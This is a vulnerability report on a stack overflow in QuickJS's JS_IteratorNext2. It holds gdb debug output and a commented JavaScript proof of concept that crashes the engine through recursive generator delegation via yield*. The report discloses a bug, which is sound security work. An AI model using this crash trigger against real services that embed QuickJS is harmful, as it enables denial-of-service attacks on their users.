QuickJS
Stack-based Buffer Overflow
Description
The JS_IteratorNext2 function is called recursively, causing the stack pointer to move down to the bottom of the stack mapping (in the debug output below, `$rsp` equals the start address of the `[stack]` region).
Build environment
Ubuntu 16.04, gcc version 6.5.0 20181026
Debug information:
→ 0x48164a <JS_IteratorNext2.lto_priv.35+202> call QWORD PTR [rax+0x38]
0x48164d <JS_IteratorNext2.lto_priv.35+205> pop rcx
0x48164e <JS_IteratorNext2.lto_priv.35+206> pop rsi
0x48164f <JS_IteratorNext2.lto_priv.35+207> jmp 0x481601
gef➤ vmmap stack
[ Legend: Code | Heap | Stack ]
Start End Offset Perm Path
0x00007fffff7ff000 0x00007ffffffff000 0x0000000000000000 rw- [stack]
gef➤ p $rsp
$1 = (void *) 0x7fffff7ff000
The PoC
// Setup for the PoC.  Several declarations here are dead weight: `nullChars`
// and `PSXh` are never read, and the hand-rolled iterator installed on
// `badIter` is replaced (`badIter = g();` further down) before anything
// iterates it.
var nullChars = new Array();
var badIter = {};
// `iter` is declared with `var` further down, so this reads the hoisted,
// still-undefined binding: 3 / undefined === NaN.  The value is overwritten
// by `var iter = g();` later and plays no part in the crash.
iter = 3 / iter;
// Iterator whose next() returns a number rather than an iterator-result
// object.  Not exercised in the final flow, because `badIter` is reassigned
// to a generator before `iter.next()` runs.
badIter[Symbol.iterator] = function () {
  return {
    next: function () {
      return 8;
    }
  };
};
var PSXh = Error; // unused alias
// Generator under test.  `yield*` delegates to whatever `badIter` holds at
// the moment the body first runs.  Because `badIter` is reassigned to a
// second g() instance before `iter.next()` is called, that delegation
// targets another instance of this same generator, whose own `yield*` then
// targets the generator that is already executing.  Per the report, QuickJS
// handles this re-entrant delegation by calling JS_IteratorNext2 recursively
// until the stack mapping is exhausted (see the $rsp value above).  A
// conforming engine is expected to reject resuming an executing generator
// with a TypeError instead, which the catch below would store in `caught`.
function* g() {
  try {
    yield* badIter;
    // Reached only if the delegation completes.  `NFhf` is never read; the
    // out-of-range element values are simply coerced by the Uint8Array
    // constructor and are not part of the crash.
    var NFhf = new Uint8Array([
      1.3,
      -9007199254740991,
      1200,
      0,
      0,
      1,
      1e+81,
      4294967295,
      9007199254740991
    ]);
  } catch (err) {
    // `caught` is a hoisted global declared below (`var result, caught;`).
    caught = err;
  }
}
var iter = g();       // first generator instance; its body has not run yet
var result, caught;   // `caught` is written by g's catch block
// Swap the iterable for a second instance of g before driving the first one,
// so `yield* badIter` inside `iter` delegates to another g() whose own
// `yield*` targets the generator that is currently executing.
badIter = g();
// Starts the delegation chain described in the report.
result = iter.next();